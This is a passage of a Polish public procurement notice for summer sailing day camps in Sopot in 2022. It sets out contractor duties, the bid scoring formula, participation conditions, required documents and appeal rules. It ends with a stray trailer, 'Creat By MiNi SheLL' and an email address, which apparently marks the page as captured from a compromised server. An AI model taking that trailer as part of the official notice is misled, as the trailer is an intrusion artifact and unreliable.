asekuracyjnych z atestami, pasów trapezowych,<br/>	odpowiedniego zabezpieczenia ratowniczego - motorówek do asekuracji (min. 2 szt.),<br/>	szatni i sanitariatów.<br/>2)	zapewnienia (opłacenia) uczestnikom zajęć żeglarskich (teoretycznych i praktycznych) ubezpieczenia od następstw nieszczęśliwych wypadków powstałych w czasie uczestnictwa w zajęciach oraz w drodze z i do miejsca zajęć,<br/>3)	zapewnienia wyżywienia dla każdego uczestnika - 1 ciepłego posiłku (obiadu dwudaniowego) zgodnie z zasadami higieny żywienia oraz wody, herbaty i kruchych ciasteczek. <br/>4)	wystawienia dla każdego uczestnika dyplomów ukończenia półkolonii żeglarskich, <br/>5)	oznaczenia dokumentów związanych z realizacją przedmiotu zamówienia (np. listy obecności, ankiety), dokumenty, które podaje do wiadomości publicznej lub przeznacza dla uczestników projektu (np. materiały dydaktyczne, dyplomy ukończenia półkolonii), <br/>6)	zapewnienia higienicznych i bezpiecznych warunków realizacji zajęć, przestrzegania obowiązujących wymogów sanitarnych w przypadku organizacji zajęć (m.in. zapewnienie przy wejściu do pomieszczenia i w środku pomieszczenia płynu do dezynfekcji rąk, zapewnienie dobrej wentylacji pomieszczenia - częste wietrzenie, zapewnienie odpowiednich odległości między stolikami itd..), stosowania wytycznych GIS, MZ w zakresie zapobiegania, przeciwdziałania i zwalczania Covid – 19.<br/>Razem: <br/>6 turnusy x 5 dni x 9 h = 270 h<br/>6 grup x 10 osób = 60 osób<br/><br/>Miejsce i sposób realizacji zamówienia:<br/>Półkolonie będą się odbywały w okresie wakacji letnich 2022 r. w dniach od poniedziałku do piątku w godzinach 8.00- 17.00. <br/>W ramach 45 godzin zajęć (5 dni x 9 h) na 1 turnus półkolonii:<br/>	30 godz. stanowić mają zajęcia (na wodzie), <br/>	15 godz. stanowić mają pozostałe zajęcia (na lądzie).<br/><br/>Półkolonie będą sie odbywały w okresie wakacji letnich 2022 r. w następujący sposób: <br/>I turnus półkolonii trwający 5 dni dla 10 uczniów (1 grupa x 10 osób)<br/>II turnus półkolonii trwający 5 dni dla 10 uczniów (1 grupa x 10 osób)<br/>III turnus półkolonii trwający 5 dni dla 10 uczniów (1 grupa x 10 osób)<br/>IV turnus półkolonii trwający 5 dni dla 10 uczniów (1 grupa x 10 osób)<br/>V turnus półkolonii trwający 5 dni dla 10 uczniów (1 grupa x 10 osób)<br/>VI turnus półkolonii trwający 5 dni dla 10 uczniów (1 grupa x 10 osób)<br/><br/>Wykonawca zapewni bezpieczne i higieniczne warunki wypoczynku, bezpieczne korzystanie z wyznaczonego obszaru wodnego, dostęp do opieki medycznej, zapewni środki higieniczne i zachowa zasady bezpieczeństwa uwzględniające stan epidemii oraz dopełni wszelkich pozostałych obowiązków wynikających z przepisów prawa dot. organizatorów wypoczynku, a także przygotuje program wypoczynku, który będzie dostosowany do wieku, potrzeb, sprawności fizycznej, umiejętności uczniów – uczestników półkolonii i przedstawi go do akceptacji Zamawiającego przed podpisaniem umowy. <br/>Wykonawca będzie zobowiązany podać Zmawiającemu propozycje terminów półkolonii w wymaganym okresie realizacji zamówienia. Zamawiający zastrzega sobie możliwość wyboru dowolnego terminu półkolonii spośród terminów zaproponowanych przez Wykonawcę. <br/><br/>Miejsce realizacji półkolonii: na terenie miasta Sopotu<br/><br/>Termin wykonania zamówienia:<br/>Zamawiający wymaga realizacji całości zamówienia w terminie 10 tygodni od dnia zawarcia umowy jednak nie wcześniej niż od dnia 27.06.2022 i nie później niż do dnia 31.08.2022 r. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80413000-2 - Usługi szkół nauki żeglowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">70 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje możliwość udzielenia zamówień, o których mowa w art. 305 pkt 1) <br/>w związku z art. 214 ust. 1 pkt. 7 ustawy Pzp.<br/>Zamówienia polegające na powtórzeniu podobnych usług zostaną udzielone w przypadku, gdy zaistnieje uzasadniona potrzeba rozszerzenia zamówienia podstawowego i zostaną zapewnione środki finansowe na ten cel. <br/>Zamówienie zostanie udzielone w trybie zamówienia z wolnej ręki – art. 305 uPzp. <br/>Powyższe zamówienia mogą zostać udzielone o ile Wykonawca spełni przynajmniej następujące warunki: Wykonawca dotychczas realizował usługi w terminie i z najwyższą starannością; zapewni nie gorszy standard wykonywania nowego zamówienia niż podstawowego; Wykonawca zaakceptuje istotne warunki dotychczasowej umowy.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Dla części 2 zamówienia:<br/><br/>a) cena brutto oferty – 60%<br/>b) doświadczenie pierwszego instruktora żeglarstwa/trenera żeglarstwa w prowadzeniu zajęć żeglarskich – 20% <br/>c) doświadczenie drugiego instruktora żeglarstwa/trenera żeglarstwa w prowadzeniu zajęć żeglarskich – 20% <br/><br/>Opis zastosowanych kryteriów:<br/>a) w ramach kryterium – cena brutto, z możliwością uzyskania maksymalnie 60 punktów Zamawiający przyzna punkty stosując wzór arytmetyczny: <br/>	<br/>&#34;Pkc = &#34; (&#34;Cn × &#34; &#34;W&#34; _&#34;1&#34; &#34; × 100&#34; )/&#34;Cb&#34; <br/>gdzie:<br/>Pkc - ilość punktów dla kryterium cena <br/>Cn - najniższa cena brutto, <br/>W1 – wskaźnik 0,60<br/>Cb - cena brutto badanej oferty<br/><br/>b) w ramach kryterium – doświadczenie pierwszego instruktora żeglarstwa/trenera żeglarstwa z możliwością uzyskania maksymalnie 20 punktów Zamawiający przyzna punkty w sposób następujący:<br/><br/>Ocenie podlegać będzie doświadczenie pierwszegoinstruktora żeglarstwa/trenera żeglarstwa wykazane ponad doświadczenie, nabyte w ciągu ostatnich 5 lat przed upływem terminu na składanie ofert, a jeśli okres prowadzonej działalności jest krótszy, w tym okresie, wymagane na potwierdzenie spełnienia warunku udziału w postępowaniu.<br/><br/>Doświadczenie pierwszego instruktora żeglarstwa/trenera żeglarstwa ponad doświadczenie wymagane na potwierdzenie spełnienia warunku udziału w postępowaniu – waga 20%<br/><br/>przeprowadzenie 3 usług (warunek udziału w postępowaniu) – 0 pkt.<br/>przeprowadzenie od 1 do 2 usług ponad wskazane na potwierdzenie warunków udziału – 10 pkt. <br/>przeprowadzenie od 3 do 4 usług ponad wskazane na potwierdzenie warunków udziału – 15 pkt.<br/>przeprowadzenie powyżej 4 usług ponad wskazane na potwierdzenie warunków udziału – 20 pkt.<br/><br/>Zamawiający oceniał będzie doświadczenie na podstawie wykazu zrealizowanych usług (ponad wymagane na potwierdzenie warunku udziału) zawartego w formularzu oferty (załącznik nr 1 do SWZ). <br/><br/>UWAGA :<br/>Wykonawca powinien mieć na uwadze, iż przedmiotowe kryterium oceny oferty wiąże się z warunkami udziału w postępowaniu, o których mowa w rozdziale 5 SWZ. <br/>Wskazanie powinno pozwolić Zamawiającemu na ocenę oferty w sposób jednoznaczny i precyzyjny. Niejednoznaczne, niepełne lub nieprawidłowe wypełnienie dokumentów mających wykazać doświadczenie, obciąża Wykonawcę.<br/><br/>c) w ramach kryterium – doświadczenie drugiego instruktora żeglarstwa/trenera żeglarstwa z możliwością uzyskania maksymalnie 20 punktów <br/>Zamawiający przyzna punkty w sposób opisany w punkcie b) <br/><br/>Maksymalna liczba punktów do uzyskania przy uwzględnieniu obu kryteriów oceny ofert wynosi 100 i zostanie obliczona zgodnie z formułą: <br/> P = Pkc + Pkd1 + PKd2 <br/>gdzie:<br/>P – łączna ilość punktów dla wszystkich kryteriów <br/>Pkc – Ilość punktów dla kryterium cena brutto oferty<br/>Pkd1 – ilość punktów dla kryterium doświadczenie pierwszego instruktora żeglarstwa/trenera żeglarstwa <br/>Pkd2 – ilość punktów dla kryterium doświadczenie drugiego instruktora żeglarstwa/trenera żeglarstwa <br/><br/>Zamawiający udzieli zamówienie Wykonawcy którego oferta uzyska najwyższa ilość punktów łącznie ze wszystkich kryteriów i którego oferta będzie spełniać wszystkie wymagania opisane w niniejszej swz.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie pierwszego instruktora żeglarstwa/trenera żeglarstwa w prowadzeniu zajęć żeglarskich</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie drugiego instruktora żeglarstwa/trenera żeglarstwa w prowadzeniu zajęć żeglarskich</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> ROZDZIAŁ 5. SWZ :WARUNKI UDZIAŁU W POSTĘPOWANIU<br/>5.1 O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>5.1.1 zdolności do występowania w obrocie gospodarczym– Zamawiający nie określa szczegółowego warunku w tym zakresie,<br/>5.1.2 uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów – Zamawiający nie określa szczegółowego warunku w tym zakresie,<br/>5.1.3 sytuacji ekonomicznej lub finansowej – Zamawiający nie określa szczegółowego warunku w tym zakresie,<br/>5.1.4 zdolności technicznej lub zawodowej – Warunek zostanie spełniony jeżeli Wykonawca wykaże, że:<br/><br/><br/>dla części 1 zamówienia <br/>a)	dysponuje lub będzie dysponował sprawnymi jednostkami pływającymi o długości nie przekraczającej 6 m, których podstawowym czynnikiem napędowym jest jeden lub więcej żagli w ilości:<br/>	co najmniej 10 łódek klasy Optymist dla młodszych uczniów, <br/>	co najmniej 3 łódek klasy O’pen Skiff i/lub katamaranami dla starszych uczniów, <br/>przeznaczonymi do nauki żeglowania i spełniającymi wymogi prawa w tym zakresie, przy pomocy których Wykonawca będzie Wykonywał zamówienie,<br/><br/>b)	dysponuje lub będzie dysponował co najmniej dwiema (2) osobami - instruktorami żeglarstwa /trenerami żeglarstwa, skierowanymi do realizacji zamówienia posiadającymi doświadczenie polegające na prowadzeniu zajęć żeglarskich dla dzieci i/lub młodzieży i zrealizowali należycie w ciągu ostatnich czterech (4) lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy, to w tym okresie co najmniej trzy (3) usługi, których zakres odpowiada przedmiotowi zamówienia a w szczególności prowadzili szkolenia żeglarskie, prowadzili zajęcia żeglarskie w ramach szkółek żeglarskich, kolonii żeglarskich, półkolonii żeglarskie, obozów żeglarskich.<br/>Warunek musi być spełniony przez każdą z osób skierowanych do realizacji zamówienia odrębnie. <br/><br/>dla części 2 zamówienia<br/>a)	dysponuje lub będzie dysponował co najmniej 2 sprawnymi jednostkami pływającymi o długości do 6 m, których podstawowym czynnikiem napędowym jest jeden lub więcej żagli przeznaczonymi do nauki żeglowania i spełniającymi wymogi prawa w tym zakresie, przy pomocy których Wykonawca będzie Wykonywał zamówienie,<br/>b)	dysponuje lub będzie dysponował co najmniej dwiema (2) osobami - instruktorami żeglarstwa /trenerami żeglarstwa, skierowanymi do realizacji zamówienia, posiadającymi doświadczenie polegające na prowadzeniu zajęć żeglarskich dla dzieci i/lub młodzieży i zrealizowali należycie w ciągu ostatnich czterech (4) lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy, to w tym okresie co najmniej trzy (3) usługi, których zakres odpowiada przedmiotowi zamówienia, a w szczególności prowadzili zajęcia żeglarskie w ramach kolonii żeglarskich, półkolonii żeglarskich, obozów żeglarskich, szkółek żeglarskich, prowadzili szkolenia żeglarskie.<br/>Warunek musi być spełniony przez każdą z osób skierowanych do realizacji zamówienia odrębnie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw wykluczenia: <br/><br/>1) oświadczenia wykonawcy w zakresie art. 108 ust. 1 pkt.5 o braku przynależności do tej samej grupy kapitałowej (w rozumieniu ustawy z dn. 16 lutego 2007 r. o ochronie konkurencji i konsumentów) z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej - załączniki nr 3 do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania warunków udziału w postępowaniu: <br/><br/>dla części 1 zamówienia<br/>1)	wykazu jednostek pływających przy pomocy których Wykonawca będzie realizował zamówienie oraz podstawy dysponowania tymi jednostkami – załącznik nr 5 do SWZ<br/>2)	wykazu imiennego instruktorów żeglarstwa/trenerów żeglarstwa skierowanych do realizacji przedmiotu zamówienia wraz z informacjami na temat ich uprawnień niezbędnych do wykonania zamówienia publicznego, posiadanego doświadczenia oraz podstawy dysponowania tym osobami - załącznik nr 7 do SWZ <br/>dla części 2 zamówienia<br/>1)	wykazu jednostek pływających przy pomocy których Wykonawca będzie realizował zamówienie oraz podstawy dysponowania tymi jednostkami – załącznik nr 6 do SWZ<br/>2)	wykazu imiennego osób skierowanych do realizacji zamówienia (instruktorów żeglarstwa/trenerów żeglarstwa) wraz z informacjami na temat ich uprawnień niezbędnych do wykonania zamówienia publicznego, posiadanego doświadczenia oraz podstawy dysponowania tym osobami - załącznik nr 8 do SWZ</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców (konsorcja, spółki cywilne) powyższe oświadczenia składa wraz z ofertą każdy z Wykonawców wspólnie ubiegających się o zamówienie. Dokumenty te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w którym każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu. <br/><br/>Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby przedstawiają wraz z oświadczeniem, o którym mowa w pkt. 6.1 także oświadczenie podmiotu udostępniającego zasoby potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu, w zakresie w jakim wykonawca powołuje się na jego zasoby.<br/><br/>Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby na podstawie art. 118 ust. 4 u Pzp składa wraz z ofertą zobowiązanie podmiotu udostępniającego zasoby, do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia, które potwierdza, że stosunek łączący wykonawcę z podmiotem udostępniającym zasoby gwarantuje rzeczywisty dostęp do tych zasobów.<br/><br/>Pozostałe dokumenty, które musi złożyć Wykonawca wraz z ofertą w niniejszym postępowaniu: <br/>1)	Jeżeli w imieniu wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika z odpisu lub informacji z Krajowego Rejestru Sądowego, Centralnej Ewidencji i informacji o Działalności Gospodarczej lub innego właściwego rejestru zamawiający żąda pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie do reprezentowania wykonawcy.<br/>2)	Zapisy pkt. 1) stosuje się odpowiednio do osoby działającej w imieniu wykonawców wspólnie ubiegających się o udzielenie zamówienia <br/>3)	Zapisy pkt. 1) stosuje się odpowiednio do osoby działającej w imieniu podmiotu udostępniającego zasoby na zasadach określonych w art. 118 uPzp lub podwykonawcy niebędącego podmiotem udostępniającym zasoby na takich zasadach. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (spółki cywilne/konsorcja).<br/><br/>W przypadku, o którym mowa w pkt 5.4 Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. <br/><br/>W przypadku Wykonawców wspólnie ubiegających się o zamówienie, oświadczenie, o którym mowa w ust. 6.1 SWZ składa każdy z tych Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/><br/>Jeżeli oferta Wykonawców występujących wspólnie zostanie wybrana, Zamawiający na podstawie art. 59 u Pzp będzie żądał przed zawarciem umowy w sprawie udzielenia zamówienia publicznego, kopii umowy regulującej współpracę tych wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiany postanowień niniejszej umowy mogą nastąpić w następującym zakresie :<br/>a)	sposobu rozliczania umowy lub dokonywania płatności na rzecz Wykonawcy<br/>- w przypadku zmian zawartej przez Zamawiającego umowy o dofinansowanie projektu lub zmian wytycznych dotyczących realizacji projektu,<br/>b)	terminu realizacji zamówienia<br/>- w przypadku okoliczności, których Zamawiający działając z należytą starannością nie mógł przewidzieć ( w szczególności związanych z Covid-19, działaniami wojennymi na Ukrainie, itp),<br/>- w przypadku wystąpienia niezawinionych i niemożliwych do uniknięcie przez Wykonawcę opóźnień wynikających z działania siły wyższej (np. klęski żywiołowej), mającej bezpośredni wpływ na terminowość realizacji zamówienia, <br/>- w przypadku działania osób trzecich, nie będącego konsekwencją winy którejkolwiek ze stron, uniemożliwiających wykonanie zamówienia w terminie.<br/>c)	sposobu realizacji zamówienia <br/>- w przypadku okoliczności, których Zamawiający działając z należytą starannością nie mógł przewidzieć ( w szczególności związanych z Covid-19, działaniami wojennymi na Ukrainie, itp.),<br/><br/>d) instruktorów żeglarstwa/trenerów żeglarstwa<br/>- w przypadku uzasadnionego wniosku Wykonawcy, pod warunkiem wyrażenia zgody przez Zamawiającego na zmianę instruktora/trenera (nowy instruktor/trener musi jednakże spełniać co najmniej takie same warunki udziału w postępowaniu jak instruktor/trener pierwotny) <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-04-26 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma e-Zamówienia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-04-26 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 19.1	Środki ochrony prawnej określone przysługują Wykonawcy, a także innemu podmiotowi, jeżeli ma lub miał interes w uzyskaniu zamówienia oraz poniósł lub może ponieść szkodę w wyniku naruszenia przez Zamawiającego przepisów niniejszej ustawy.<br/>19.2	Środki ochrony prawnej wobec ogłoszenia wszczynającego postępowanie o udzielenie zamówienia przysługują również organizacjom wpisanym na listę, o której mowa w art. 464 pkt 15 uPzp, oraz Rzecznikowi Małych i Średnich Przedsiębiorców.<br/>19.3	Odwołanie przysługuje na niezgodną z przepisami ustawy czynność Zamawiającego podjętej w postępowaniu o udzielenie zamówienia publicznego lub zaniechaniu czynności w postępowaniu do której Zamawiający był zobowiązany na podstawie ustawy lub zaniechanie przeprowadzenia postępowania o udzielenie zamówienia na podstawie ustawy, mimo, że Zamawiający był do tego obowiązany.<br/>19.4	Odwołanie wnosi się do Prezesa Izby. <br/>19.5	Odwołanie wnosi się w terminie 5 dni od dnia przesłania informacji o czynności Zamawiającego stanowiącej podstawę jego wniesienia, jeżeli informacja została przekazana przy użyciu środków komunikacji elektronicznej albo w terminie 10 dni, jeżeli informacja została przekazana w inny sposób.<br/>19.6	Odwołanie wobec czynności innych niż określone w pkt 21.3 wnosi się w terminie 5 dni od dnia, w którym powzięto lub przy zachowaniu należytej staranności można było powziąć wiadomość o okolicznościach stanowiących podstawę jego wniesienia.<br/>19.7	Na orzeczenie Izby stronom oraz uczestnikom postępowania odwoławczego przysługuje skarga do sądu. Skargę wnosi się do sądu okręgowego właściwego dla siedziby albo miejsca zamieszkania Zamawiającego.<br/>19.8	Od wyroku sądu lub postanowienia kończącego postępowanie w sprawie nie przysługuje skarga kasacyjna.

Creat By MiNi SheLL
Email: jattceo@gmail.com